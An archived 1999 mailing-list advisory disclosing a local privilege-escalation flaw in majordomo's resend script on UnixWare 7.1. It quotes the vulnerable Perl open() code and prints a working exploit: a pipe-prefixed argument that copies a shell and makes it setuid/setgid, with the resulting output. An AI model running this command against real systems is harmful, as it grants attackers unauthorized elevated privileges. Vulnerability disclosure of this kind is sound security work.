majordomo local exploit

From: Brock Tellier (btellierat_private)
Date: Tue Dec 28 1999 - 18:47:44 PST

  • Next message: Pavel Kankovsky: "Re: Announcement: Solaris loadable kernel module backdoor" 

    OVERVIEW
A vulnerability in majordomo allows local users to gain elevated
privileges.

BACKGROUND
I've only tested the version of majordomo which comes with UnixWare 
7.1 which is 1.94.4.  This vulnerability may or not still be present 
in newer versions of majordomo, but it exists on the default UW7.1
installation.

Thanks to rain.forest.puppy for his paper on how to exploit CGI/perl
scripts, as it helped me out in this exploit.  Grab it at
http://www.wiretrip.net/rfp/p/doc.asp?id=6&iface=2

DETAILS
The majordomo wrapper allows users to run programs in the
/usr/local/majordomo directory with the uid of owner and the gid of
daemon.  The permissions for wrapper are:

-rwsr-xr-x    1 root     daemon         6464 Jan  4  1999
/usr/local/majordomo/wrapper

but wrapper immediatly setuid()'s and setgid()'s to owner:daemon before
execing the wrapped program.

A vulnerability in "/usr/local/majordomo/resend" will allow us to execute
arbitrary commands with our elevated privileges.  The following code
snippet appears in resend, a perl script:

-snip-

# If the first argument is "@filename", read the real arguments
# from "filename", and shove them onto the ARGV for later processing
# by &Getopts()
#
if ($ARGV[0] =~ /^\@/) {
    $fn = shift(@ARGV);
    $fn =~ s/^@//;
    open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");

-snip-

As you can see, if our first argument to resend starts with a "@", 
resend will attempt to open() the filename.  However, open() can 
also be used to run programs if the first argument to open() begins 
with a pipe "|".  If our first argument is "@|id", resend will run 
the program "id" with full privileges.

EXPLOIT

Our exploit is simple:

bash-2.02$ /usr/local/majordomo/wrapper resend '@|cp /bin/ksh
/tmp/xnec;chmod 6555 /tmp/xnec'
resend: must specify '-l list' at /usr/local/majordomo/resend line 77.

bash-2.02$ ls -la /tmp/xnec
-r-sr-sr-x    1 owner    daemon       361688 Dec 29 06:26 /tmp/xnec

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellierat_private


____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:24:01 PDT